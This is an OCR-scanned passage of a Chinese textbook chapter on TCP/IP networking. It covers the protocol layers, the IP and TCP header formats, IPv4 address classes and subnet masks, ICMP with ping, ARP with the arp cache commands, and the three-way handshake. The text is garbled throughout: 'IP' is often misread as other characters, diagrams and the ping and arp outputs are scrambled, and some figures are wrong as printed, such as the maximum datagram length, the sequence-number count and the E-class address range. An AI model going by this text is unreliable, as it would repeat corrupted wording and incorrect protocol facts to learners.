网 络 层 对 应 OSI 参考 模型 的 网 络 层 , 重要 的 网 络 层 协 议 包括 卫 协议 (Interet Protocol， 
网 际 协议 )、ICMP (Intemet Control Message Protocol， 网 际 控制 报 文 协 议 )、ARP (Address 
Resolution Protocol， 地 址 解析 协议 ) 和 RARP (Reverse Address Resolution Protocol， 反 向 
地 址 解析 协议 ) 等 。 

3) 传输 层 

传输 层 对 应 OSI 参考 模型 的 传输 层 。 传 输 层 包括 TCP (Transmission Control Protocol， 
传输 控制 协议 ) 和 UDP (User Datagram Protocol， 用 户 数据 报 协议 )， 它 们 是 传输 层 中 最 主 
要 的 协议 。 
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4) 应 用 层 

应 用 层 对 应 OSI 参考 模型 的 应 用 层 、 表 示 层 和 会 话 层 。 应 用 层 位 于 协议 栈 的 顶端 ， 它 
的 主要 任务 是 应 用 。 常 见 的 应 用 层 协议 有 : FTP (File Transfer Protocol， 文 件 传输 协议 )、 
HTTP (Hyper Text Transfer Protocol， 超 文本 传输 协议 )、DNS (Domain Name Service， 域 
名 服务 器 协议 ) 和 SMTP (Simple Mail Transfer Protocol， 简 单 邮 件 传 输 协 议 ) 等 。 

2. OSI 参考 模型 和 TCP/IP 模型 的 比较 

图 2-2 是 OSI 参考 模型 和 TCP/IP 模型 的 比较 ， 同 时 将 各 种 网 络 协议 归 类 。 


OSI 参考 模型 TCP/IP 模 型 协议 
应 用 层 
表示 层 应 用 层 FTP/HTTPIDNSSMTP 等 
会 话 层 
传输 层 传输 层 TCP/UDP 
网 络 层 网 络 层 IP/ICMP/ARPIRRARP 等 
链 路 层 有 
网 络 接口 层 PPP/HDLC 等 
物理 层 


图 2-2 OSI 参考 模型 和 TCP/IP 模型 比较 


OSI 参考 模型 和 TCP/IP 模型 两 种 分 层 的 主要 不 同 之 处 是 ，TCP/IP 在 实现 上 力求 简单 
高 效 ， 如 IP 层 并 没有 实现 可 靠 的 连接 ， 而 是 把 它 交 给 了 传输 层 的 TCP 协议 去 实现 ， 这 样 
保证 了 IP 层 实现 的 简单 性 。 事 实 上 有 些 服务 并 不 需要 可 靠 的 面向 连接 服务 ， 如 在 IP 层 加 
上 可 靠 性 控制 ， 只 能 说 是 一 种 处 理 能 力 的 浪费 。OSI 参考 模型 在 各 层 的 实现 上 有 所 重复 ， 
而 且 会 话 层 和 表示 层 不 是 对 所 有 服务 都 有 用 ， 无 疑 这 种 模型 有 些 烦 琐 。 

3. TCP/IP 工作 原理 

下 面 以 使 用 TCP 传送 文件 为 例 说 明 TCP/TP 的 工作 原理 。 

(1) 在 源 主机 上 的 应 用 层 将 一 串 字 节 流 传送 给 传输 层 。 

(2) 传输 层 将 应 用 层 的 数据 流 截 成 分 组 ， 并 加 上 TCP 报头 形成 TCP 段 ， 送 交 网 络 层 。 

(3) 在 网 络 层 给 TCP 段 加 上 包括 源 、 目 的 主机 IP 地 址 的 他 报头 ， 生 成 一 个 卫 数据 
包 ， 并 将 他 数据 包 送 交 链 路 层 。 

(4) 链 路 层 在 其 帧 的 数据 部 分 装 上 IP 数据 报 ， 再 加 上 源 、 目 的 主机 的 MAC 地 址 和 帧 
头 ， 并 根据 其 目的 MAC 地 址 ， 将 帧 发 往 目 的 主机 或 他 路由器。 

(5) 在 目的 主机 ， 链 路 层 将 帧 的 帧 头 去 掉 ， 并 将 卫 数据 包 送 交 网 络 层 。 

(6) 网 络 层 检查 下 报头 ， 如 果 报 头 中 校 验 和 与 计算 结果 不 一 致 ， 则 丢弃 该 卫 数据 包 ; 
车 校 验 和 与 计算 结果 一 致 ， 则 去 掉 卫 报头 ， 将 TCP 段 送 交 传输 层 。 

(7) 传输 层 检查 顺序 号 ， 判 断 是 否 是 正确 的 TCP 分 组 ， 然 后 检查 TCP 报头 数据 。 若 
正确 ， 则 向 源 主机 发 确认 信息 ; 若 不 正确 或 丢 包 ， 则 向 源 主机 要 求 重 发 信息 。 

(8) 在 目的 主机 ， 传 输 层 去 掉 TCP 报头 ， 将 排 好 顺序 的 分 组 组 成 应 用 数据 流 送 给 应 用 
程序 。 

这 样 目 的 主机 接收 到 来 自 源 主机 的 字 节 流 ， 就 像 是 直接 接收 来 自 源 主机 的 字 节 流 一 样 。 


2.3 网 际 协议 IP 


卫 协议 又 称 网 际 协议 ， 是 支持 网 间 互 联 的 数据 报 协议 ， 它 与 TCP 一 起 构成 TCP/IP 协 
议 簇 的 核心 ，IP 层 接 收 由 更 低层 发 来 的 数据 报 ， 并 把 该 数据 包 发 送 到 更 高 层 TCP 或 UDP 
层 ; 相反 ,IP 层 也 把 从 TCP 或 UDP 层 接 收 来 的 数据 包 传送 到 更 低层 。IP 数据 报 是 不 可 靠 
的 ， 因 为 IP 并 没有 做 任何 事情 来 确认 数据 报 是 按 顺 序 发 送 的 或 者 没有 被 破坏 。 卫 数据 包 
中 含有 发 送 它 的 主机 的 地 址 〈 源 地 址 ) 和 接收 它 的 主机 的 地 址 〈 目 的 地 址 )。 

2.3.1 IP 数据 报 的 格式 


IP 数据 报 的 格式 能 够 说 明 卫 协议 都 具有 什么 功能 。 图 2-3 是 人 P 数据 报 的 完整 格式 。 


位 0 4 8 16 19 24 32 
版 本 | 首部 长 度 | 区 分 服务 总 长 度 
标 识 标志 | 片 偏 移 
生存 时 间 协议 首部 检验 和 
源 地 址 
目的 地 址 
可 选 字段 (长 度 可 变 ) 填充 


图 2-3 人 P 数 据 报 的 格式 


从 图 2-3 中 可 看 出 , 一 个 他 数据 报 由 首部 和 数据 两 部 分 组 成 。 首 部 的 前 一 部 分 是 固定 
长 度 ， 共 20 字 节 ， 是 所 有 人 P 数据 报 必 须 具 有 的 。 在 首部 的 固定 部 分 的 后 面 是 一 些 可 选 字 
段 ， 其 长 度 是 可 变 的 。 下 面 介绍 首部 各 字段 的 意义 。 

(1) 版 本 : 占 4 位 ， 指 出 当前 使 用 的 人 P 版 本 。 

(2) 首部 长 度 : 占 4 位 ， 指 数据 报 协议 头 长 度 ， 可 表示 的 最 大 十 进 制 数 值 是 15。 

(3) 区 分 服务 : 占 8 位 ， 用 来 获得 更 好 的 服务 。 

(4) 总 长 度 : 总 长 度 指 首部 和 数据 之 和 的 长 度 ， 单 位 为 字 节 。 总 长 度 字 段 为 16 位 ， 
因此 数据 报 的 最 大 长 度 为 21=65 535 字 节 。 

(5) 标识 : 占 16 位 ， 包 含 一 个 整数 ， 用 于 识别 当前 数据 报 。 

(6) 标志 : 占 三 位 ， 但 目前 只 有 两 位 有 意义 。 标 志 字 段 中 的 最 低位 为 MF (More 
Fragment)，MF=1 表示 后 面 “ 还 有 分 片 ”的 数据 报 。MF=0 表示 这 已 是 若干 数据 报 片 中 的 
最 后 一 个 。 标 志 字 段 中 间 的 一 位 记 为 DF (Don’t Fragment)， 意 思 是 “不 能 分 片 ”” 只 有 当 
DF=0 时 才 允 许 分 片 。 

(7) 片 偏 移 ， 占 13 位 ， 指 出 与 源 数据 报 的 起 始 端 相关 的 分 片 数 据 位 置 ， 支 持 目标 人 P 
适当 重建 源 数据 报 。 

(8) 生存 时 间 : 占 8 位 ， 表 明 数 据 报 在 网 络 中 的 寿命 。 

(9) 协议 : 占 8 位 ， 指 出 在 人 P 处 理 过 程 完成 之 后 ， 有 哪 种 上 层 协议 接收 导入 数据 包 。 

(10) 首部 校 验 和 : 占 16 位 ， 这 个 字段 只 检验 数据 的 首部 ， 但 不 包括 数据 部 分 。 
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(11) 源 地 址 : 占 32 位 。 
(12) 目的 地 址 : 占 32 位。 
(13) 选项 : 允许 人 P 支持 各 种 选项 ， 如 安全 性 。 


2.3.2 IPv4 的 JP 地 址 分 类 


在 Internet 上 ， 为 了 实现 连接 到 互联 网 上 的 节点 之 间 的 通信 ， 必 须 为 每 个 连接 到 互联 
网 的 节点 分 配 一 个 地 址 ， 并 且 应 当 保证 这 个 地 址 是 全 球 唯一 的 ， 这 就 是 IP 地 址 。 卫 地 址 
长 32bit， 最 初 设计 互联 网 络 时 ， 为 了 便于 寻 址 以 及 层次 化 构造 网 络 ， 每 个 人 P 地 址 包括 两 
个 标识 码 (ID), 即 网 络 ID 和 主机 了 .同一 个 物理 网 络 上 的 所 有 主机 都 使 用 同一 个 网 络 ID， 
网 络 上 的 一 个 主机 (包括 网 络 上 工作 站 ， 服 务 器 和 路 由 器 等 ) 有 一 个 主机 ID 与 其 对 应 。 
Internet 委员 会 定义 了 5 种 PP 地 址 类 型 以 适合 不 同 容量 的 网 络 ， 即 A 类 ~E 类 。5 类 不 同 
的 他 地 址 格式 如 图 2-4 所 示 。 

IP 地 址 是 一 个 32 位 的 二 进 制 数 ， 通 常 被 分 割 为 4 个 “8 位 二 进 制 数 ”( 也 就 是 4 个 字 
节 )。IP 地 址 通常 用 “点 分 十 进 制 ” 表 示 成 a.b.c.d 的 形式 ， 其 中 ，a、b、c、d 都 是 0 一 255 
之 间 的 十 进 制 整数 。 例 如 ， 点 分 十 进 人 P 地 址 100.4.5.6， 实 际 上 是 32 位 二 进 制 数 
01100100.00000100.00000101.00000110， 它 是 一 个 A 类 地 址 。 区 分 各 类 地 址 最 简单 的 方法 


是 看 它 的 第 一 个 十 进 制 整 数 ， 图 2-5 列 出 了 各 类 地 址 的 起 止 范 围 。 
7 位 24 位 
A 类 |0| 网 络 号 EE 机 号 
14 位 16 位 
B 类 [0 网 络 号 | 主机 号 类 型 范围 
21 位 8 位 
C 类 |1|1|0| 网 络 号 主机 号 A 0.0.0.0~127.255.255.255 
28 位 B 128.0.0.0~191.255.255.255 
D 类 IhTio 多 播 组 号 C 192.0.0.0~223.255.255.255 
27 位 D 224.0.0.0~239.255.255.255 
E 类 [ITTITITO 留待 后 肌 E 240.0.0.0~247.255.255.255 
图 2-4 5 类 下地 址 图 2-5 各 类 也 地 址 范围 


卫 地 址 又 可 分 为 公有 地 址 和 私有 地 址 。 

(1) 公有 地 址 (public address) 由 Inter NIC (Intemet Network Information Center， 因 
特 网 信息 中 心 ) 负责。 这 些 人 P 地址 分 配给 注册 并 向 Inter NIC 提出 申请 的 组 织 机 构 ， 通 过 
它 直 接 访问 因特网 。 

(2) 私有 地 址 (private address) 属于 非 注 册 地 址 ， 专 门 供 组 织 机 构 内 部 使 用 。 

以 下 列 出 留用 的 内 部 私有 地 址 : 

A 类 10.0.0.0 一 10.255.255.255 

B 类 172.16.0.0~172.31.255.255 

C 类 192.168.0.0 一 192.168.255.255 


2.3.3 子 网 播 玛 
IP 标准 规定 ， 每 一 个 使 用 子 网 的 网 点 都 选择 一 个 32 位 的 位 模式 ， 若 位 模式 中 的 某 位 


置 1， 则 对 应 了 P 地 址 中 的 某 位 为 网 络 地 址 中 的 一 位 ; 车 位 模式 中 的 某 位 置 0， 则 对 应 下 地 
址 中 的 某 位 为 主机 地 址 中 的 一 位 ,例如 位 模式 11111111.11111111.11111111.00000000 中 , 前 
三 个 字 节 全 1， 代 表 对 应 IP 地 址 中 最 高 的 三 个 字 节 为 网 络 地 址 ; 后 一 个 字 节 为 0， 代 表 对 
应 下 地 址 中 最 后 一 个 字 节 为 主机 地 址 。 

1. 子 网 掩 码 的 表示 方法 

(1) 通过 与 卫 地 址 格式 相同 的 点 分 十 进 制 表示 ， 例 如 ，255.0.0.0 或 255.255.255.128。 

(2) 在 IP 地 址 后 加 上 “/” 符 号 以 及 1 一 32 的 数字 ， 其 中 1 一 32 的 数字 表示 子 网 掩 码 
中 网 络 标识 位 的 长 度 ， 例 如 ，192.168.1.1/24 的 子 网 掩 码 也 可 以 表示 为 255.255.255.0。 

2. 子 网 掩 码 作 用 

子 网 掩 码 是 一 个 32 位 地 址 , 是 与 瑟 地 址 结合 使 用 的 一 种 技术 。 它 的 主要 作用 有 两 个 ， 
一 是 用 于 屏蔽 IP 地 址 的 一 部 分 以 区 别 网 络 标识 和 主机 标识 ， 二 是 用 于 将 一 个 大 的 IP 网 络 
划分 为 若干 小 的 子 网 络 。 
下 面 以 一 个 实例 来 介绍 如 何 使 用 子 网 掩 码 来 区 分 网 络 地 址 的 网 络 号 和 主机 号 。 

例如 ， 有 一 C 类 IP 地 址 为 192.168.200.4， 子 网 掩 码 为 255.255.255.0， 则 它 的 网 络 号 
和 主机 号 可 按 如 下 方法 得 到 。 

(1) 将 卫 地 址 192.168.200.4 转换 为 二 进 制 数 。 

11000000.10101000.11001000.00000100 

(2) 将 子 网 掩 码 255.255.255.0 转换 为 二 进 制 数 。 

11111111.11111111.11111111.00000000 

(3) 将 下 地 址 与 子 网 掩 码 按 位 “与 ”运算 得 到 的 结果 为 网 络 部 分 。 

11000000.10101000.11001000.00000000 

运算 结果 转化 为 十 进 制 为 192.168.200.0， 通 过 得 出 的 运算 结果 ， 确 定 网 络 号 为 
192.168.200.0。 

(4) 将 子 网 掩 码 取 反 后 再 与 他 地 址 按 位 “与 ”运算 得 到 的 结果 为 主机 部 分 。 

00000000.00000000.00000000.00000100 

运算 结果 转化 为 十 进 制 为 0.0.0.4， 通 过 得 出 的 运算 结果 ， 确 定 主机 号 为 4。 


2.4 网 际 控制 报 文 协 议 ICMP 


ICMP 网 际 控制 报 文 协议 是 TCP/IP 协议 簇 的 子 协议 ， 用 于 在 人 P 主机 、 路 由 器 之 间 传 
递 控制 报 文 。 控 制 报 文 是 指 网 络 是 否 连通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 络 本 身 的 消 
息 。 这 些 控制 报 文昌 然 并 不 传输 用 户 数据 , 但 是 对 于 用 户 数据 的 传递 起 着 非常 重要 的 作用 。 


2.4.1 ICMP 报 文 的 格式 


ICMP 报 文通 常 被 人 P 层 或 更 高 层 协议 使 用 ， 一 些 ICMP 报 文 把 差错 报 文 返 回 给 用 户 进 
程 。ICMP 报 文 是 在 IP 数据 报 内 部 被 传输 的 ， 它 的 格式 如 图 2-6 所 示 。 

ICMP 报 文 的 前 4 个 字 节 是 统一 的 格式 ， 共 有 三 个 字段 : 类型、 代码 和 检验 和 。 接 着 
的 4 个 字 节 的 内 容 与 ICMP 的 类 型 有 关 。 最 后 面 是 数据 字段 ， 其 长 度 取决 于 ICMP 的 类 型 。 
表 2-1 给 出 了 几 种 常用 的 ICMP 报 文 类 型 。 
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位 0 8 16 32 
类 型 代码 检验 和 
(这 4 个 字 节 取决 于 ICMP 报 文 的 类 型 ) 


ICMP 的 数据 部 分 (长 度 取决 于 类 型 ) 


ICMP 报 文 


首 部 数据 部 分 
= IP 数 据 报 = 


图 2-6 ICMP 报 文 的 格式 


表 2-1 几 种 常用 的 ICMP 报 文 类 型 


类 型 的 值 ICMP 报 文 的 类 型 


ICMP 报 文 种 类 
差错 报告 报 文 


询问 报 文 


3 终点 不 可 达 

4 源 点 抑制 

5 改变 路 由 

11 时 间 超 过 

12 参数 问题 

8 或 0 回 送 请 求 或 回答 
13 或 14 时 间 惟 请 求 或 回答 


2.4.2 ICMP 的 应 用 实例 


ICMP 的 一 个 重要 应 用 就 是 分 组 网 间 探 测 PING (Packet InterNet Groper)， 用 来 测试 两 


个 主机 之 间 的 连通 1 


使 用 网 络 层 ICMP 


性 。PING 使 用 了 ICMP 回 送 请 求 与 回 送 回答 报 文 。PING 是 应 用 层 直接 


的 一 个 例子 ， 它 没有 通过 传输 层 的 TCP 或 UDP。 


图 2-7 给 出 了 从 哈尔滨 的 一 台 主 机 到 搜狐 网 的 Web 服务 器 的 连通 性 的 测试 结果 。 主 机 
一 连 发 出 了 4 个 ICMP 回 送 请 求 报 文 , 如 果 Web 服务 器 正常 工作 而 且 响 应 这 个 ICMP 回 送 


请 求 报 文 ， 那 么 它 就 发 回 ICMP 回 送 回答 报 文 。 由 于 往返 的 ICMP 报 文 上 都 有 时 间 戳 ， 因 


此 很 容易 得 出 往返 时 间 。 


:\Users\Administrator>ping Www.sohu.com 


正在 
来 自 


往 ee ED 为 


Ping frontend-sy.a.sohu.com [218.66.39.165] 县 有 32 字 节 的 数据 : 
218.69.39.195 的 回复 : 字 节 =32 时 间 =33ms TTLz5! 

: 字 节 =32 时 间 :33ms TTL: 当 
: 字 节 =32 时 间 =32ms TTL=55 
: 字 节 =32 


时 间 =32ms TTL=55 


， 丢失 : 8 (8% 丢失 )， 
2ms, Es 


图 2-7 用 PING 测试 主机 的 连通 性 


2.S ”地址 解析 协议 ARP 


MAC 地 址 是 计算 机 最 终 能 够 识别 的 物理 地 址 ， 当 发 送 方 计 算 机 发 送 数据 时 ， 将 网 络 
连接 设备 源 MAC 地 址 和 目的 MAC 地 址 分 别 封装 到 帧 的 源 MAC 位 和 目的 MAC 位 。 然 后 
将 其 发 送 到 网 络 介质 上 。 接 收 方 计算 机 通过 查看 帧 的 目的 地 址 位 填写 的 MAC 地 址 ， 来 判 
断 是 否 和 自己 的 MAC 地 址 一 致 ， 如 果 一 致 ， 则 将 其 复制 ， 去 掉 封 装 并 传递 到 上 层 应 用 程 
序 ， 如 果 不 一 致 ， 网 卡 丢弃 该 数据 帧 。 而 通信 时 由 于 MAC 地 址 随 硬件 随机 分 布 ， 不 易 记 
忆 和 使 用 ， 人 们 一 般 使 用 更 容易 记忆 的 瑟 地 址 进行 通信 ， 但 是 我 们 指定 的 瑟 地 址 必须 转 
化 成 计算 机 识别 的 MAC 地 址 才能 通信 ，ARP 就 是 用 于 解决 这 个 问题 的 协议 。 所 谓 地 址 解 
析 (address resolution) 就 是 主机 在 发 送 帧 前 将 目标 瑟 地 址 转换 成 目标 MAC 地 址 的 过 程 。 
图 2-8 说 明了 ARP 协议 的 作用 。 


IP 地 址 中 ARP 厂 一 > MAC 地 址 


图 2-8 ARP 协议 的 作用 


2.5.1 ARP 协议 工作 原理 


ARP 协议 解析 地 址 过 程 如 下 : 

(1) 发 送 方 计算 机 首先 检查 自己 的 ARP 缓存 是 否 有 对 应 的 全 和 MAC 地址 映射 的 条 
目 。 如 果 有 ， 则 找到 MAC 地 址 ， 发 送 数据 ， 如 果 没 有 ， 则 需要 进一步 解析 。 

(2) 发 送 方 发 送 广播 ， 向 所 有 设备 询问 该 人 P 地 址 对 应 的 MAC 地 址 。 对 应 IP 地 址 的 
计算 机 回应 广播 ， 向 发 送 方 发 送 对 应 自己 他 地 址 和 MAC 地 址 的 映射 记录 ， 并 且 接 收 方 同 
时 将 发 送 方 的 他 地址 对 应 MAC 地 址 的 映射 保留 在 自己 的 ARP 缓存 中 。 

(3) 发 送 方 收 到 ARP 的 回应 后 ， 将 其 保留 在 自己 的 ARP 缓存 中 ， 以 便 下 次 使 用 。 同 
时 将 得 到 的 MAC 地 址 封装 到 帧 的 目的 地 址 位 置 ， 将 其 发 送 到 网 络 介质 中 。 

下 面 举 一 个 实例 来 解释 ARP 协议 的 工作 过 程 。 例 如 ， 如 图 2-9 所 示 ， 主 机 A 要 向 本 
局 域 网 内 的 主机 B 发 送 IP 数据 报时 ， 就 首先 在 其 ARP 高 速 缓存 中 查看 有 无 主机 了 的 全 
地 址 ， 如 果 有 ， 就 在 ARP 高 速 缓存 中 查 出 其 对 应 的 MAC 地 址 ， 再 把 这 个 MAC 地 址 写 入 
MAC 帧 ， 然 后 通过 局 域 网 把 该 MAC 帧 发 往 此 硬件 地 址 。 如 果 找 不 到 主机 也 的 他 地 址 的 
项 目 ， 主 机 A 就 会 自动 运行 ARP， 然 后 按 以 下 步骤 找 出 主机 B 的 硬件 地 址 。 

(1) ARP 进程 在 本 局 域 网 上 广播 发 送 一 个 ARP 请 求 分 组 ， 目 标 MAC 地 址 是 
“FFFFFFFFFFFF”( 全 1), 意思 是 向 同一 网 段 内 的 所 有 主机 发 出 询问 :“ 我 是 192.168.8.1， 
硬件 地 址 是 20-D0-C0-27-AB-13， 我 想 知道 主机 192.168.8.2 的 硬件 地 址 .” 图 2-9 (a) 是 
主机 A 广播 发送 ARP 请 求 分 组 的 示意 图 。 

(2) 本 局 域 网 上 的 所 有 主机 运行 的 ARP 进程 都 收 到 此 ARP 请 求 分 组 。 

(3) 网 络 上 其 他 主机 不 响应 ARP 询问 ， 只 有 主机 B 接收 这 个 帧 ， 回 应 “我 是 192.168.8.2， 
硬件 地 址 是 05-00-7B-11-DE-3A”， 同 时 更 新 自己 的 ARP 缓存 ， 如 图 2-9 (b) 所 示 。 

(4) 主机 A 知道 了 主机 也 的 MAC 地 址 ， 它 就 可 以 向 主机 B 发 送信 息 了 。 同 时 ， 它 更 
新 自己 的 ARP 缓存 ， 下 次 再 发 送信 息 给 B， 直 接 从 ARP 缓存 表 里 查找 就 可 以 了 。 


第 
2 
章 


克 乡 委 会 兹 大 理论 与 笑 践 


我 是 192.168.8.1， 硬 件 地 址 是 20-D0-C0-27-AB-13， 我 想 知道 主机 192.168.8.2 的 硬件 地 址 


< 人 ARP 请 求 ARP 请 求 E> ARP 请 求 > ARP 请 求 > 


20-D0-C0-27-AB-13 


(a) 


我 是 192.168.8.2， 硬 件 地 址 是 05-00-7B-11-DE-3A 


Bz 


= ARP 响 应 


192.168.8.2 


192.168.8.1 
D 


oo 


05-00-7B-11-DE-3A 


(b) 
图 2-9 地址 解析 协议 ARP 的 工作 原理 


2.5.2 ARP 提高 效率 措施 


为 进一步 提高 效率 ，ARP 还 采用 了 如 下 措施 。 

(1) 高 速 缓存 技术 : 主机 保存 已 知 的 ARP 表 项 ， 当 收 到 目的 主机 的 ARP 应 答 时 将 其 
中 的 信息 加 入 ARP 表 中 。 主 机 发 送信 息 时 ， 先 查询 ARP 表 ， 若 未 找到 目的 主机 的 MAC 
地 址 则 用 ARP 协议 解析 地 址 。 每 个 表 项 设置 一 个 计时 器 ,超时 即 自动 删除 ， 以 保证 表 项 的 

(2) 主机 A 发 送 ARP 请 求 时 ， 包 含 了 自己 的 瑟 地 址 和 物理 地 址 的 映射 ， 而 且 ARP 
请 求 是 以 广播 形式 发 送出 去 的 ， 所 以 包括 目的 主机 在 内 的 网 络 中 的 所 有 主机 都 会 收 到 此 信 
息 ， 可 将 此 信息 保存 下 来 ， 以 作 下 次 使 用 。 

(3) 每 台 主 机 启动 定时 广播 自己 的 卫 地 址 和 MAC 地 址 的 映射 关系 ， 以 尽量 避免 其 他 
主机 对 它 进 行 ARP 请 求 。 


2.5.3 ARP 绥 存 表 查 看 方法 


ARP 缓存 表 是 可 以 查看 的 ， 也 可 以 添加 和 修改 。 在 Windows 系统 下 ， 可 使 用 “am -a” 
命令 观察 主机 的 ARP 缓存 表 。 图 2-10 中 演示 查看 ARP 缓存 表 。 


用 “amp -d” 命 令 可 以 删除 ARP 表 中 所 有 的 内 容 ， 用 “arp -d+ 空 格 + < 指定 ip 地 址 >” 
可 以 删除 指定 了 P 所 在 行 的 内 容 ; 用 “arp -s” 可 以 手动 在 ARP 表 中 指定 全 地址 与 MAC 地 
址 的 对 应 ， 类 型 为 static〈 静 态 )， 此 项 存在 硬盘 中 ， 而 不 是 缓存 表 ， 计 算 机 重新 启动 后 仍 
然 存在 ， 且 遵循 静态 优 于 动态 的 原则 ， 所 以 这 个 设置 如 果 不 正确 ， 可 能 导致 无 法 上 网 。 


C:\Users\Administrator>arp -a 


接口 : 192.168.1.117 --- 9xc 

Internet 地 址 物理 地 址 

192.168.1.1 60-25-5e-69-13-11 
192.168.1.255 ld th i ih ph th hog hdl 
224.0.0.22 01-060-5e-00-00-16 
224.0.0.252 091-00-5e-09-09-fc 
226 .185.206 .221 91-99-5e-39-ce-dd 
229.B1 12221 061-60-5e-3d-d4-dd 
232.28.200.220 801-60-5e-1c-c8-de 
232.241.214.221 91-00-S5e-71-d6-dd 
233.154.56.115 91-00-5e-1a-38-73 


‘| 四 


球 球 球 球 球 球 于 珠 烛 冰 


图 2-10 查看 ARP 缓存 表 


2.6 ”传输 控制 协议 TCP 


TCP 可 以 提供 面向 连接 的 、 可 靠 的 、 点 到 点 的 全 双 工 传输 。 

(1) TCP 是 面向 连接 的 传输 层 协 议 。 应 用 程序 在 使 用 TCP 协议 之 前 , 必须 先 建立 连接 ， 
在 传送 数据 完毕 后 ， 必 须 释 放 已 建立 的 TCP 连接 。 

(2) TCP 提供 可 靠 交 付 的 服务 。 也 就 是 说 ， 通 过 TCP 连接 传送 的 数据 ， 无 差错 、 无 丢 
失 、 不 重复 ， 并 且 按 序 到 达 。 

(3) 每 一 条 TCP 连接 只 能 有 两 个 端点 ， 每 一 条 TCP 连接 只 能 是 点 对 点 的 。 

(4) TCP 提供 全 双 工 通信 ， 也 就 是 说 ，TCP 允许 通信 双方 的 应 用 进程 在 任何 时 候 发 送 
数据 。 


2.6.1 TCP 的 首部 格式 


TCP 报 文 段 首部 的 前 20 个 字 节 是 固定 的 ,后 面 有 4N 字 节 是 根据 需要 而 增加 的 选项 (N 
是 整数 )， 因 此 ，TCP 首部 的 最 小 长 度 是 20 字 节 ， 如 图 2-11 所 示 。 

(1) 源 端口 和 目的 端口 : 各 占 2 个 字 节 ， 分 别 写 入 源 端口 号 和 目的 端口 号 。 

(2) 序号 : 占 4 字 节 ， 序 号 范围 是 [0，2?-_1]， 共 22 ( 即 4 284 967 296) 个 序号 ， 当 
序号 增加 到 22-1 后 ， 下 一 个 序号 就 又 回 到 0。 

(3) 确认 号 : 占 4 字 节 ， 是 期 望 收 到 对 方 下 一 个 报 文 段 的 第 一 个 数据 字 节 的 序号 。 

(4) 数据 偏 移 : 占 4 位 ， 它 指出 TCP 报 文 段 的 数据 起 始 处 距离 TCP 报 文 段 的 起 始 处 
有 多 远 。 

(5) 保留 : 占 6 位 ， 保 留 为 今后 使 用 ， 但 目前 应 置 为 0。 

(6) 紧急 URG: 当 URG=1 时 ， 表 明 紧 急 指针 字段 有 效 ， 这 时 要 与 首部 中 紧急 指针 字 
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段 配合 使 用 。 

(7) 确认 ACK: 当 ACK=1 时 ， 确 认 号 字段 才 有 效 ，TCP 规定 ， 在 连接 建立 后 所 有 传 
送 的 报 文 段 都 必须 把 ACK 置 1。 

(8) 推送 PSH: 当 PSH=1 时 ， 表 示 以 最 快 的 速度 传输 数据 。 

(9) 复位 RST: 当 RST=]1 时 ， 表 明 TCP 连接 中 出 现 严重 差错 ， 必 须 释 放 连 接 ， 然 后 
再 重新 建立 传输 连接 。 

(10) 同步 SYN: 在 连接 建立 时 用 来 同步 序号 ， 当 SYN=1 表示 这 是 一 个 连接 请 求 或 连 

(11) 终止 FIN: 用 来 释放 一 个 连接 ， 当 FIN=1 时 ， 表 明 此 报 文 段 的 发 送 方 的 数据 已 
发 送 完 毕 ， 并 要 求 释放 传输 连接 。 

(12) 窗口 : 占 2 字 节 ， 窗 口 值 是 0，2:<-1] 之 间 的 整数 ， 窗 口 指 的 是 发 送 本 报 文 段 的 
一 方 的 接收 窗口 。 窗 口 值 告诉 对 方 从 本 报 文 段 首部 中 的 确认 号 算 起 ， 接 收 方 目 前 允许 对 方 
发 送 的 数据 量 。 

(13) 检验 和 : 占 2 字 节 ， 这 个 检验 和 与 了 P 的 检验 和 有 所 不 同 ， 它 不 仅 对 头 数据 进行 
校 验 还 对 内 容 进行 校 验 。 

(14) 紧急 指针 : 占 2 字 节 ， 它 指出 本 报 文 段 中 的 紧急 数据 的 字 节 数 。 

(15) 选项 : 长 度 可 变 ， 最 长 可 达 40 字 节 。 当 没有 使 用 选项 时 ，TCP 的 首部 长 度 是 20 
字 节 。 


0 8 16 24 32 
源 端 口 | 目的 端口 
序 号 
20 
字 确认 号 
节 - 
将 提 | 保 外 8 徐 昌 
检 验 和 紧急 指针 
选 项 (长 度 可 变 ) | 填充 


TCP 首 部 ”| TCP 报 文 段 的 数据 部 分 


图 2-11 TCP 的 首部 格式 


2.6.2 TCP 的 工作 原理 


TCP 是 面向 连接 的 协议 ， 传 输 连接 是 用 来 传送 TCP 报 文 的 ，TCP 传输 连接 的 建立 和 
释放 是 每 一 次 面向 连接 的 通信 中 必 不 可 少 的 过 程 。TCP 在 建立 连接 时 需要 三 次 确认 ， 俗 称 
“三 次 握手 ” 在 断 开 连接 的 时 候 需要 四 次 确认 ， 俗 称 “ 四 次 握手 ”。 

1. TCP 的 连接 建立 

图 2-12 给 出 了 TCP 的 建立 连接 的 过 程 。 假定 主 机 A 运行 的 是 TCP 客户 程序 , 而 B 运 
行 的 是 TCP 服务 器 程序 。 


三 次 握手 首先 要 求 对 本 次 连接 的 所 有 报 文 进行 编号 ， 取 一 个 随机 值 作 为 初始 序号 。 
于 序号 域 足够 长 ， 可 以 保证 序号 循环 一 周 时 使 用 同一 序号 的 旧 报 文 早已 传输 完毕 ， 网 络 上 
也 就 不 会 出 现 关 于 同一 连接 ， 同 一 序号 的 两 个 不 同 报 文 。 在 三 次 握手 的 一 次 握手 中 ，A 首 
先 向 B 发 出 连接 请 求 报 文 段 , 这 时 首部 中 的 同步 位 SYN=1, 同时 选择 一 个 初始 序号 seq=x。 
第 二 次 握手 ，B 接收 到 请 求 连接 报 文 段 后 ， 如 果 同 意 建立 连接 ， 则 向 A 发 送 确认 。 在 确认 
报 文 段 中 SYN 位 和 ACK 位 都 置 1， 确 认 号 是 ack=x+1， 同 时 也 为 自己 选择 一 个 初始 序号 
seq=y。 第 三 次 握手 ， 当 A 收 到 B 的 确认 后 ， 还 要 向 B 发 出 确认 ， 确 认 号 是 ack=y+1， 而 
自己 的 序号 是 seq=x+1， 这 时 ，TCP 连接 已 经 建立 ，A 和 B 就 可 以 进行 数据 传送 了 。 

2. TCP 的 连接 释放 

TCP 连接 释放 过 程 比较 复杂 ， 如 图 2-13 所 示 。 

客户 服务 器 


A 
RE Ws BE 
Ck s 
eq 4CK=)， 
Ww+] 
| 数据 传送 > 
图 2-12 TCP 三 次 握手 图 2-13 TCP 四 次 握手 


第 一 次 握手 ，A 的 应 用 进程 先 向 TCP 发 出 连接 释放 报 文 段 ， 并 停止 再 发 送 数 据 ， 主 动 
